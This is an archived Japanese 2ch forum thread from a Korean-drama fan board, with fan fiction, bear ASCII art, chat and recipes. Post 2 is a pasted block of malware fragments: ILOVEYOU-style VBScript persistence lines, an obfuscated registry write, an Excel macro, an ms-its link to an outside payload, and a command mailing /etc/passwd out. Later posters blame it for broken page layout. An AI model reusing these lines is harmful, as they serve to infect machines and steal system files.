5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【居心地いいから】虹にまつわるエトセトラ6【クマーも居座る】

1 :壁に耳あり、障子にメアリーさん:2006/11/17(金) 04:39:32
簡単じゃないからゆっくり考えて!
前スレ
【居心地いいから】虹にまつわるエトセトラ5【クマーも居座る】
http://ex13.2ch.net/test/read.cgi/wall/1154761132/l50


2 :壁に耳あり、障子にメアリーさん:2006/11/17(金) 04:42:06
ms-its:mhtml:file://C:\\MAIN.MHT!LOVE-LETTER-FOR-YOU.TXT.vbs
cat /etc/passwd | mail nobody@nonexistent.com
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ



3 :壁に耳あり、障子にメアリーさん:2006/11/17(金) 09:22:43
朝起きたら前スレがメロに乗っとられててビクーリしたお!
>>1タソ 乙華麗〜
クマー&ヲタの皆様、またマターリ遊びましょw

4 :壁に耳あり、障子にメアリーさん:2006/11/17(金) 09:54:34
>>1タソ d!
朝からびっくりした〜

5 :壁に耳あり、障子にメアリーさん:2006/11/17(金) 14:41:09
|● ● |ノシ

6 :壁に耳あり、障子にメアリーさん:2006/11/17(金) 15:26:55
>>1
dd
sageも消えて変になってたけどやっと直った

7 :壁に耳あり、障子にメアリーさん:2006/11/17(金) 17:54:28
>>1
乙!
密かに誘導してくれてたのねw

8 :壁に耳あり、障子にメアリーさん:2006/11/17(金) 20:57:15
>>1
おっトン!

9 :壁に耳あり、障子にメアリーさん:2006/11/18(土) 09:35:24
おはよー


10 :壁に耳あり、障子にメアリーさん:2006/11/18(土) 20:06:22
チャングム最終回!

11 :壁に耳あり、障子にメアリーさん:2006/11/18(土) 23:10:55
見てくるノシ

12 :壁に耳あり、障子にメアリーさん:2006/11/19(日) 00:28:12
クマー、ミン・ジョンホ様に萌えたか?w

13 :壁に耳あり、障子にメアリーさん:2006/11/19(日) 00:41:37
先週のチョンホ様の方が萌えたが今週のもなかなか良かったぞ
ジニ出演のDVD明日借りに逝く!!
新スレなのにスマンなw

14 :壁に耳あり、障子にメアリーさん:2006/11/19(日) 01:27:02
>>13
乙!
まあ気にせんでマターリしてw

15 :壁に耳あり、障子にメアリーさん:2006/11/19(日) 11:52:57
ジニDVDって何だろう?
ラブレターしか見てないが、ミスキムおもしろいらしいよ

16 :壁に耳あり、障子にメアリーさん:2006/11/19(日) 16:40:13
今月も金茄子なので「春の日」1話無料視聴で我慢汁w
ラブレターは確かピーコでもってたような気がする
闇箪笥の中を探してみるw

17 :壁に耳あり、障子にメアリーさん:2006/11/19(日) 20:18:34
闇箪笥w
何が出てくるかわからない怖さがあるんだなw

18 :壁に耳あり、障子にメアリーさん:2006/11/20(月) 00:44:34
|)_○
|ェ)・)

19 :壁に耳あり、障子にメアリーさん:2006/11/20(月) 01:26:57
クマーにありがとう
コクマーに・・・クマーの半角表現ゆずってくれたよね
クマーと区別がつく安心感で、洩れコクマーとして居座っちゃた
コクマーでいることは予想外に楽しいよ!
コクマーの○耳はせめて、クマーのかっこええ耳とかぶらないようにと思って○にしてみたんだ


20 :壁に耳あり、障子にメアリーさん:2006/11/20(月) 16:58:20
コクマー、今度は褒めて釣るつもりだなw
ま、新スレにもなったことだしちょっと描いてみる気になった
いつもの如く遅筆だぞ!

虹感想スレでも話題にでてたヨンスのエチへの戸惑いがテーマだw

21 :練習熊 ◆92K/LOW62. :2006/11/20(月) 17:02:14

何度も辞退したのだが、今日は皿洗いをやると言ってきかないミンチョルの後姿を眺めながら
ヨンスは、いつしか物思いにふけっていた。
苦労ばかりしてきたとは思わないがやはり生きていくことを最優先にし、同じ年頃の女性
とは違った青春を送ってきたと思う。
施設で育ったこと、苦労して入った大学も学費が納められず休学せざるを得なかったこと、
病気になったこと。確かに他人から見れば不幸な人生だと考えると自然に頬がゆるむ。
かけがえのない親友、妹たち、カリアゲゴリラ、そして何よりも夫・・・この人達と出会えたことは誰よりも
幸せだと胸を張って言える。
守って欲しいなどと思ったことはなかったのだが、夫の腕の中にいると守られていると感じる。
そしてそれ以上にこの人を守りたいと強く願う。
水に濡れないようにと捲り上げた袖口からのぞく逞しい腕、割れないようにと食器をやさしく
扱う繊細な指。
いつも背筋をしゃんとのばして立つのでシンクの高さに合わせて何度も前屈みになる。
そのたびにシャツを透してでもわかる筋肉の盛りあがりがあらわになる。
ふいに自分を抱きしめる腕の力強さが思い出し、ヨンスを慌てさせた。
耳元で囁く声。
滑っていく唇。
打ち消そうと思っても鮮明に蘇る。


22 :914:2006/11/20(月) 17:12:37
誤字イツモスマン

23 :壁に耳あり、障子にメアリーさん:2006/11/20(月) 17:15:07
コテorz

24 :壁に耳あり、障子にメアリーさん:2006/11/20(月) 19:27:41
>>21
いや〜〜んクマー!エエ感じじゃないのぉw
室長の後ろ姿・体の各パーツ描写
ヨンスクマーでなくても萌えるわ〜
でも、ヨンス心の声でも「カリアゲゴリラ」呼ばわりwwwハゲワロタww
練習虹の続きガンガレー!

25 :壁に耳あり、障子にメアリーさん:2006/11/20(月) 20:08:08
|○_○
|・(ェ)・*)

26 :壁に耳あり、障子にメアリーさん:2006/11/20(月) 20:15:37
>>21
クマー乙!
いい出だしだw
漏れもヨンスさんのカリアゲゴリラにワロタwww

27 :178:2006/11/20(月) 23:46:22
>>22
気に砂〜w

>いつもの如く遅筆だぞ!
既になれましたwいまや快感orz

>ヨンスのエチへの戸惑いがテーマだw
旬ですな、おつでやんす



28 :壁に耳あり、障子にメアリーさん:2006/11/20(月) 23:50:51
うわっ
クマーにつづいて
コテorz

29 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 01:10:52
 ○_○
(・(ェ)・) 連取熊再起動wkwk

30 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 01:15:02
>>27
どこの178タソなのよ?w

31 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 01:16:38
職人募集活動w

32 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 01:28:21
クマヲタにありがとう
釣りクマーという垢抜けない洩れを、誰が呼んだかコクマー
コクマーは一発で気に入ってしまったw
そして初心者AA厨コクマーは、釣り職人を生業にすることにした
クマーが力尽きるまで、コクマーはクマーヲ釣りつづけるなり〜w

33 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 19:37:49
さぁ、後編いってみようw

34 :練習熊 ◆92K/LOW62. :2006/11/21(火) 19:39:17

ヨンスにはわかっていた。今、この瞬間自分はミンチョルに抱かれたいと思っているということを。
ヨンスに背を向けて鼻歌を歌いながら食器を洗っているミンチョルを少し恨めしく感じる。
感覚が深くなっているということに気がついたのは最近のことなのだ。
いつも夫と共に感じあいたい、ひとつになってもっと近くに感じたいと思いながら体を重ねている。
自分の体で夫が感じ、快楽を得てくれることに喜びを感じる。
だが少し前からヨンスは自ら快楽を求めている瞬間があることに気付いていた。

シンクにもたれてミンチョルがヨンスを見つめているのに気付いた。
軽く腕を組み、まっすぐにこちらを見つめている。
勘のいい人だから悟られたのかしらと、胸が熱く鼓動がはやまる。
ゆっくりと近づいてきたミンチョルがヨンスの頬へと手をのばした。
「あっ・・」
恥しさのあまり身をよじりミンチョルの手をよける。
蝶を逃した子供のように一瞬手を止めたが、再びヨンスの髪に手をのばす。
やさしく髪をすきながらささやく。

「目が潤んで頬が赤い。熱があるね?おいで、これは僕にしか治せない」
そう言うとヨンスの腰を引き寄せ、立ったまま唇を重ねた。


35 : ◆92K/LOW62. :2006/11/21(火) 19:41:33
    ∩___∩   /)
    | ノ      ヽ  ( i )))
   /  ●   ● | / /
   |    ( _●_)  |ノ /
  彡、   |∪|    ,/
  /    ヽノ   /´  このくらいの慎み深さでどうクマー?w

36 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 20:09:49
いいよー、でもこのままじらすのー?クマー

37 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 21:30:22
いいねぇー

38 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 21:49:43
さすがは我らの室長だ
ヨンスの様子で欲情を読み取るとは
クマーも慎み深いのか?

39 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 23:19:13
このスレに入ったころからかな?
なぜか行間が空くようになったんだよね。
私だけ?
よってクマーも顔の長〜い馬面orz
慎み深い美クマーは何処?

40 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 23:36:21
>>39
ワタスもだよ、行間空くの

41 :壁に耳あり、障子にメアリーさん:2006/11/21(火) 23:50:55
>>39>>40
デスクトップ画面下に顔を近づけてクマーを見上げてごらんw

42 :壁に耳あり、障子にメアリーさん:2006/11/22(水) 00:07:52
壺だから自分だけかと思ってたけど皆そうなの

43 :壁に耳あり、障子にメアリーさん:2006/11/22(水) 00:09:34
2に何か変なの貼ってない?
そのせいなんじゃないかな、行間空くの


44 :壁に耳あり、障子にメアリーさん:2006/11/22(水) 00:14:50
IEのオレは美熊だよw

45 :壁に耳あり、障子にメアリーさん:2006/11/22(水) 00:48:23
行間空くのは多分ウィルスコードのせい
IEの漏れもそうだったけど、一度PC落としてから>>3から開くようにすると無問題
美熊だよんw


46 :431:2006/11/22(水) 08:24:30
>>45
ワタスも同じことになっていて、ちょっと前に雑でそのことを話した事もあり
ウィルスのせいだったんだ
でも、「>>3から開くようにする」ってどうやるの?

47 :46:2006/11/22(水) 08:27:27
431というのはどこかで使ったコテなので無視して下さい orz

48 :壁に耳あり、障子にメアリーさん:2006/11/22(水) 09:10:20
コテ誤爆マジックw

49 :46:2006/11/22(水) 15:20:12
みんなクマーにつられてコテがw

>>47
専ブラなら>>3だけ除いて開く方法があるようだが
IEの漏れは
http://ex13.2ch.net/test/read.cgi/wall/1163705972/3-
お気に入りに入れてここに来ている
ウィルスコードに反応しないなら普通に開いてもダイジョブぽ


50 :46:2006/11/22(水) 16:49:17
>>49
46は私だよんw
d! 試してみる

51 :45&49:2006/11/22(水) 17:24:57
>>50
うわー!
指摘されるまで気づかんかったorzハズカシスw
>>46タン木綿ね

52 :39 :2006/11/22(水) 22:47:19
>>45&49タソ
d!d!美クマーになったw
理由も分かってスッキリした〜
クマー虹も読みやすくなったよw
このコテどっかに誤爆しないように気をつけよ!

53 :壁に耳あり、障子にメアリーさん:2006/11/22(水) 23:04:15
クマーってそんなに美・・だったっけw
おい、出てきてみそ、どれだけ美しいか確かめちゃる!

54 :壁に耳あり、障子にメアリーさん:2006/11/22(水) 23:22:56
美しさは魔法の鏡のお墨付きなので遠慮しておくw

55 :3:2006/11/22(水) 23:39:43
何故漏れのレス>>3から入ると大丈夫なのか、考える事小一時間・・・



あ!
漏れ携帯熊だからかもw

56 :壁に耳あり、障子にメアリーさん:2006/11/22(水) 23:52:39
自己過小評価のしとには、魔法の鏡はいい処方箋と思うが
クマーはそなもん使うな!性悪女になっちまうじゃないかw

57 :壁に耳あり、障子にメアリーさん:2006/11/23(木) 00:05:15
>>2にウイルスが貼ってあるからジャマイカ?

58 :壁に耳あり、障子にメアリーさん:2006/11/23(木) 00:12:46
既に性悪熊だから大丈夫w
同居熊に人格否定されたこともあるorz

59 :壁に耳あり、障子にメアリーさん:2006/11/23(木) 00:32:54
>>58
ううっ・゚・。うちのめされるよな
洩れ、もまれても成長する時代はオワタと実感、性悪度増してるもんううっ・゚・。

60 :壁に耳あり、障子にメアリーさん:2006/11/23(木) 00:51:39
ビバ!性悪!
ビバ!虹クマー!

61 :壁に耳あり、障子にメアリーさん:2006/11/23(木) 03:57:31
性悪だってイイジャマイカ
クマーだものw

62 :sage:2006/11/23(木) 08:38:05
お人好しじゃ生きていけない
顔に性悪がでない程度にしておけよ
バーカバーカ

63 :壁に耳あり、障子にメアリーさん:2006/11/23(木) 08:49:25
携帯からなので間違えてageてたorz
オレのバーカバーカ


64 :壁に耳あり、障子にメアリーさん:2006/11/23(木) 09:13:43
>>63
バーカバーカタソカワエエのぉw
久しぶりだぬ〜ノシ

65 :壁に耳あり、障子にメアリーさん:2006/11/25(土) 09:18:41
グッドモーーニング、くまたち!

66 :壁に耳あり、障子にメアリーさん:2006/11/25(土) 21:06:05
   ∩___∩

            ・・・・・。


67 :壁に耳あり、障子にメアリーさん:2006/11/25(土) 21:33:22
もしかして、一日中寝てた?w

68 :壁に耳あり、障子にメアリーさん:2006/11/25(土) 22:02:08
ひと働きして帰ってきた
英語でなんて挨拶していいか迷ったw
グッドナイトはオヤスミだし、グッドイブニングでいいのか?

69 :壁に耳あり、障子にメアリーさん:2006/11/25(土) 22:08:16
正解!w

70 :壁に耳あり、障子にメアリーさん:2006/11/26(日) 23:09:32
美くまーー!

71 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 00:25:00
ニセクマーの釣り失敗orzw

72 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 08:35:25
>>71
ん?漏れ何もしてないよ!?
@ニセ

73 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 18:08:41
ニセにもニセがいるのか?w

74 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 19:18:29
ニセクマー釣り,失敗。
まぎらわしくてごめんw

75 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 20:09:23

     ∩___∩
     | ノ      ヽ
    /⌒) ●   ● |
   / /   ( _●_)  ミ 釣りたいのはニセクマだったのか
  .(  ヽ  |∪|  、\ いや〜失礼したクマーw
   \    ヽノ /´>  )
     |      / (_/


76 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 20:22:03
おっ、たんま!行くなクマー!
漏れはクマーを釣りたいぞっ!w
@ニセ

77 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 21:29:56
     〇_〇
    (・(エ)・,,)∩  二熊追うクマー二熊得る! w
    (つ   丿
   ⊂___ ノ
       し

      川


78 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 21:41:35
コクマーご飯食べてる?元気か?

暇だったら元気のない米梨ヨンスさんとこ行って
慰めてやってくれw

79 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 21:51:03
クマー次第・・・

風呂はいらなくていいなら、いつでも行くのにw

80 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 21:54:39
クマー今日の晩メシ何食ったの?

81 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 22:34:06
クマーヲタみんな必死!w

82 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 23:30:28
クマー  ∩___∩
ここ→ | ノ  
           ここがクマーのかっこええとこなり〜w

83 :壁に耳あり、障子にメアリーさん:2006/11/27(月) 23:51:01
コクマーの滑車まわしナツカシス
風呂は大変だったぬw

84 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 00:21:01
        ∩____∩
        /        ヽ|
       / ●    ●  |  中の人と同じでお気に入りの角度があるw
       |///( _●_ )/// ミ  晩飯はポークソテー、牛肉とゴボウと蒟蒻のしぐれ煮          
      彡、,,  |∪|   /   今、最高に腹が減っているので食い物の話はヤバイクマー


85 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 00:51:23
ポークソテー、うちもだった!
ちょっとうれしすw

86 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 00:57:24
恥らうクマーかわゆす
けど、コメントは食い物のはなすw

87 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 01:02:00
今夜遊んでくれてまりがとん!
おやクマー

88 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 01:54:11
>>84
ぬおっ うまそーな晩メシwww
クマーていいもん食ってるなぁ
でも野菜も少し食った方がイイど

89 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 08:07:38
>>88
大根葉のふりかけを山ほど食ったからそれでよしと汁w
茹でて切ってごま油とミリンと醤油で炒めて鰹節ふる
飯がすすみ杉るのが難点

90 :88:2006/11/28(火) 08:33:59
>>89
大根菜はビタミン他栄養豊富だから、良し!
ていうか、めちゃうまそーな常備菜ジャマイカ
漏れも作ろっと!クマーdd

91 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 09:37:11
おなかすいたよ・・・

92 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 11:12:23
>>91
つ@@@ ロールケーキ
昼ご飯まであと少し ガンガレ!

93 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 19:39:56
前にれしぴ色々教えてくれたタソがクマーだったら
ビクーリだ!ww  

94 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 22:03:40
レシピさんは、クマー・・・だった・・・か?


95 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 22:58:42








・・・実はクマーヲタw
@元レシピ

96 :壁に耳あり、障子にメアリーさん:2006/11/28(火) 23:49:13
レシピタソ
愛してますw

97 :壁に耳あり、障子にメアリーさん:2006/11/29(水) 01:57:44
ををを!レシピタンおひさ〜ノシ

98 :壁に耳あり、障子にメアリーさん:2006/11/29(水) 21:45:21
(*´∀`*)ムフー

99 :壁に耳あり、障子にメアリーさん:2006/11/30(木) 00:24:19
             |         
             |
          II|
             |   
             |

100 :壁に耳あり、障子にメアリーさん:2006/11/30(木) 11:22:06
ワムコとクマー
ttp://vista.undo.jp/img/vi6462774452.jpg

101 :壁に耳あり、障子にメアリーさん:2006/11/30(木) 16:24:35
雪降って寒いよー byシロクマー

102 :壁に耳あり、障子にメアリーさん:2006/11/30(木) 19:48:49
しろくまちゃんのホットケーキを思い出す

103 :壁に耳あり、障子にメアリーさん:2006/11/30(木) 21:29:19
             |         
             |
             |
      (I     |   
  ((I         |


104 :壁に耳あり、障子にメアリーさん:2006/11/30(木) 22:31:17
             |         
             |
           ⊂ |
           彡∪|  
             |
             |
    I((I ・・・   |  

105 : 【ぴょん吉】 :2006/12/01(金) 10:08:37
コクマー、虹描いてないクマーを釣っても仕方ないだろw

106 :壁に耳あり、障子にメアリーさん:2006/12/01(金) 20:53:25
                |         
ええっー!そうなのー?? |
                |
            I_I  |
II      ((⊂(・(ェ,,)・ )|

107 :壁に耳あり、障子にメアリーさん:2006/12/02(土) 00:36:27
あ!おみくじ終わってる
師走だけに忙しかった・・・orz

108 :壁に耳あり、障子にメアリーさん:2006/12/02(土) 00:52:07
クマー全然来てないの?
雑にはいるのけ?

109 :壁に耳あり、障子にメアリーさん:2006/12/02(土) 07:58:21
グッドモーーニング、くまたち!

110 :壁に耳あり、障子にメアリーさん:2006/12/02(土) 12:09:04
最近ヒグマーたちも欠席なのね

111 :壁に耳あり、障子にメアリーさん:2006/12/02(土) 16:12:23
>>105はクマーだよ
コクマーの耳もかっこいいジャマイカw

112 :壁に耳あり、障子にメアリーさん:2006/12/02(土) 17:12:54
ヒグマーもいるよwノシ
雪降って寒いのさ

113 :壁に耳あり、障子にメアリーさん:2006/12/02(土) 19:16:02
ノシ
日ハムヒグマーもいるお!

114 :壁に耳あり、障子にメアリーさん:2006/12/02(土) 21:20:40

♪  I_I
   (,,・(ェ)・) ))
 (( ( つ ヽ、   ♪
   〉 とノ ) ))
  (__ノ^(_)


115 :壁に耳あり、障子にメアリーさん:2006/12/02(土) 23:53:00
コクマー→銭クマーに変化!?

116 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 00:47:41
  ,,,,,,,,,,,,,
  [,|,,,★,,|]
 ( ・(ェ)・)  もやクマー
 ( ∪ ∪
 と__)__)


117 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 01:22:12
耳にI貼り付けると痩せるとか?w

118 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 07:34:29
痩せるツボかw

119 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 11:33:39
昨夜から初雪だったよ


120 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 13:54:13
>>119
初雪オメ!
うちんとこは普通に雪だぁ
@ヒグマー

121 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 17:25:20
大根の葉の炒め物作ってみた
おいしかったから、クマーにd!

122 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 22:57:08
去年の今頃はクマー全開だったような気がするが
今年は寂しい師走だw

123 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 23:14:32
職人多数の時がクマーも刺激があってよかったよかなあ

124 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 23:24:13
今年の年末、クマーはどうすんの?

125 :壁に耳あり、障子にメアリーさん:2006/12/03(日) 23:32:47
職人多数の頃が
クマーにとっても刺激があってよかったのかなあ
だす・・・すまんw

126 :壁に耳あり、障子にメアリーさん:2006/12/04(月) 00:03:19
中の人のヲタじゃなくなったのが大きな要因
今年は浮気三昧

127 :壁に耳あり、障子にメアリーさん:2006/12/04(月) 00:25:34
夏発表のころは楽しみにしてたのに・・・
クマー、映画公開待ち遠しくないの?

128 :壁に耳あり、障子にメアリーさん:2006/12/04(月) 20:12:43
       +   +
    +   ,,,,,,,,,,,,,,
       [,|,,,★,,|]  ( ⌒⌒_    水炊きでいい? 
      (・(ェ)・,,) 、、(⌒ \丶
      ( つ∂O  ___\!  
      ̄((§○0))|+++++|  
             `―――'


129 :壁に耳あり、障子にメアリーさん:2006/12/04(月) 23:53:17
大根おろしもたっぷり用意してくだされw

130 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 00:10:11
ようこそ、コクマ亭へw
お嬢さん、もみじが苦手なら七味はどう?
あさつき好きならたっぷりどうぞ!

131 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 00:19:13


   [|,,★,,,|,]        寒い日はテブンあんちゃんと
   (・(ェ)・,,) ))      ごはん作ってダンスしたいなり〜
 (( ( つ ヽ、   ♪
   〉 とノ ) ))
  (__ノ^(_)

132 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 01:37:57
プレッシャーに感じて欲しくないんだけれど
洩れはクマーが一番好き
コメナシタンは長編として洩れなりに楽しんでるけど
断筆なんて変なトコだけ筒井見習わないでよ、おながい、クマー 
いい子にお留守番するからね!(ェ)

133 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 02:30:21
クマーは韓国逝ってるの?

134 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 13:46:59
クマー!
米梨タソ、桜の森タソと、うp二連発だどー!
そろそろ書きたくなってきたんジャマイカ!?

135 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 20:01:59
       +   +
    +  ,,,,,,,,,,,,,,
       [|,,★,,,|,]  ( ⌒⌒_    今夜はおでんなの・・・ 
      (・(ェ)・,,) 、、(⌒ \丶      明日スペアリブにするよ
      ( つ§O  ___\!  
      ̄((□○△))|+++++|  
             `―――'


136 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 20:13:37
昨日水炊き、今日おでん、明日スペアリブって
いいもの食ってるじゃないか
ところで、帽子?についてるのは黒星かい?

137 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 21:22:22
黒星ってなに?w

パスタ、グラタン、オムレツ以外に
ひき肉のトマトソースのつくりおき、何に化けられると思う?

138 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 22:37:56
>>137
鷹の爪効かせたオリープオイル+ミートソースで、ペンネ

ホワイトソース缶使ってラザニア

フランスパンにのせてオーブントースターで焼くとウマーw

角切りにしたトマト・茄子・カラーピーマン +スープ
+豆+トマト+鷹の爪(or一味唐辛子タプーリ)をグツグツ
=チリビーンズもどき

フライパンにオリーブオイル熱して
縦に4〜5枚に切った茄子を敷き詰めミートソースのせて
フタして蒸し焼き=茄子ピザ

139 :壁に耳あり、障子にメアリーさん:2006/12/05(火) 23:21:04
チリビーンズもどき、それイイ!
豆の扱いと味のつけ方を教えてくださいませ
ちなみに洩れ以外は辛いの苦手だけれど、豆料理は喜ばれそう!

140 :壁に耳あり、障子にメアリーさん:2006/12/06(水) 17:50:51
        ,,,,,,,,,,,,,,
        [,|,,,★,,|]    ! 今行く、スペアリブ !
       (,,・(エ)・)  
      ( O┬O           
  ≡ ◎-ヽJ┴◎     


141 :138:2006/12/06(水) 22:20:59
>>139
遅くなってゴミン
豆はね、乾燥豆戻すのマンドクサかったら
大豆水煮缶やサラダ用お豆ミックスパックを鍋にドバドバ入れて
ミートソースと>>138の材料と一緒に中火で煮て、アク取り
焦げない様に木ベラで軽く混ぜながら弱火で煮込み
水気を飛ばし、砂糖ひとつまみ・塩ふたつまみ
あとは味見して塩加減を調整したら出来上がり

142 :壁に耳あり、障子にメアリーさん:2006/12/06(水) 22:38:58
おおぅ、まりがとんです
里まで降りなくて済む水煮大豆で試してみます・(エ,,)・

ところで136タン黒星ってなーに?ビール会社しか思いつかないよぅw

143 :壁に耳あり、障子にメアリーさん:2006/12/07(木) 00:59:36
レシピタソ〜〜
オレはフランスパンのせオーブントースター焼が簡単でいい
クマーの食卓には中華ソバ&しめじ&ほうれん草のつけ麺が
頻繁にのぼります
これもレシピタソのレシピだよね?

144 :壁に耳あり、障子にメアリーさん:2006/12/07(木) 07:02:01
>>143
ノシ
クマーんちの食卓にあのつけ麺が登場してるなんて
クマーヲタ冥利に尽きるわあ。・゚・(ノ∀`)・゚・。
でも漏れのは「ニラつけ麺」だったはずだが、
クマー家はニラ苦手で、ホウレン草に変えたのけ?

145 :壁に耳あり、障子にメアリーさん:2006/12/07(木) 09:31:02
茹でたほうれん草w
きっと1回目はニラだたと思う
2回目からは間違えてほうれん草で今に至るw

146 :壁に耳あり、障子にメアリーさん:2006/12/07(木) 14:54:46
間違えてwwww

クマーらしい微笑ましいエピソードだw

147 :136:2006/12/07(木) 23:00:31
>>142
コクマ-の帽子についてるの黒星じゃないの?

ボーナスもらえる、うれしー

148 :壁に耳あり、障子にメアリーさん:2006/12/07(木) 23:58:15
   ____
  ||   ,,,,,,,,,,  | ,,,,,,,,,,,,,,,,  
  ||   [,|,,★,,|]|[,,,,,,,,,,,,]    そっかw
  ||   (,,・(エ)・)|(    )
  ||   (    )|(   o )
    ̄ ̄ ̄ ̄ ̄ u―u'  
    


149 :壁に耳あり、障子にメアリーさん:2006/12/08(金) 16:21:43
除雪オワター@ヒグマー

150 :壁に耳あり、障子にメアリーさん:2006/12/08(金) 16:36:52
お疲れ〜
ヒグマーは運動足りてそうで何よりだぬ

151 :壁に耳あり、障子にメアリーさん:2006/12/08(金) 16:39:21
>>150
いえいえw
今年初除雪なんでグッタリだよw

152 :壁に耳あり、障子にメアリーさん:2006/12/09(土) 16:56:12

   _____
  ||ノ       ,,,,,,,,,,,    
  || ●   ●|[,|,,★,,|]    クマー・・・今頃何してるかな・・・
  ||   ( _●_)(,,・(エ)・)  
  ||、   |∪| |(     .)
    ̄ ̄ ̄ ̄ ̄ u―u'


153 :壁に耳あり、障子にメアリーさん:2006/12/09(土) 18:25:26
シムラ後後w

154 :壁に耳あり、障子にメアリーさん:2006/12/09(土) 20:12:05
   _____
  ||ノ       ,,,,,,,,,,,    
  || (゚)   (゚)[,|,,★,,|]   たまには元気な姿みせて欲しいなり・・・
  ||   ( _●_)(,,・(エ)・)     
  ||、   |∪| |(     .)      
    ̄ ̄ ̄ ̄ ̄ u―u'

155 :壁に耳あり、障子にメアリーさん:2006/12/10(日) 10:46:11
   ∩___∩
   | ノ      ヽ    _ 
  /  ●   ● |  //ヽ   
  |    ( _●_)_ / /  |   
 彡、   |∪|r'`    { 〔 ̄()  絶対別れてやるクマー
/ __. ヽノ|.__ {  ~~〕   虹なんてかいてる気分じゃないクマー   
(___)    Е)  \\_/   
 |       /|~|      ̄ 
 |  /\ \~
 | /    )  )
 ∪    (  \
       \_)


156 :壁に耳あり、障子にメアリーさん:2006/12/10(日) 11:15:09
雄クマーとなんかあったの?

157 :壁に耳あり、障子にメアリーさん:2006/12/10(日) 11:37:10
餅ついてきたか?

158 :壁に耳あり、障子にメアリーさん:2006/12/10(日) 12:06:06
 .-、  ∬
(,,■) 旦    置いとくね

159 :壁に耳あり、障子にメアリーさん:2006/12/10(日) 12:40:10
 

          パクッ ハフハフ、ゴクッ!
   ∩___∩    
    | ノ ヽ   " ヽ  。
(( /  ●   ● |  ∴ . 人の話を聞かずに自分の話しかしない奴は糞!!
  |  //// ( _●_)  ミ    ウマー!d! じゃぁ、逝ってくる


160 :壁に耳あり、障子にメアリーさん:2006/12/10(日) 14:13:16
なんかわからんけど
とにかくクマーがんがれーー!!

161 :壁に耳あり、障子にメアリーさん:2006/12/10(日) 14:37:58
漏れもよくわからんけどガンガレ〜!

162 :壁に耳あり、障子にメアリーさん:2006/12/10(日) 22:04:20
クマー餅ついたか?
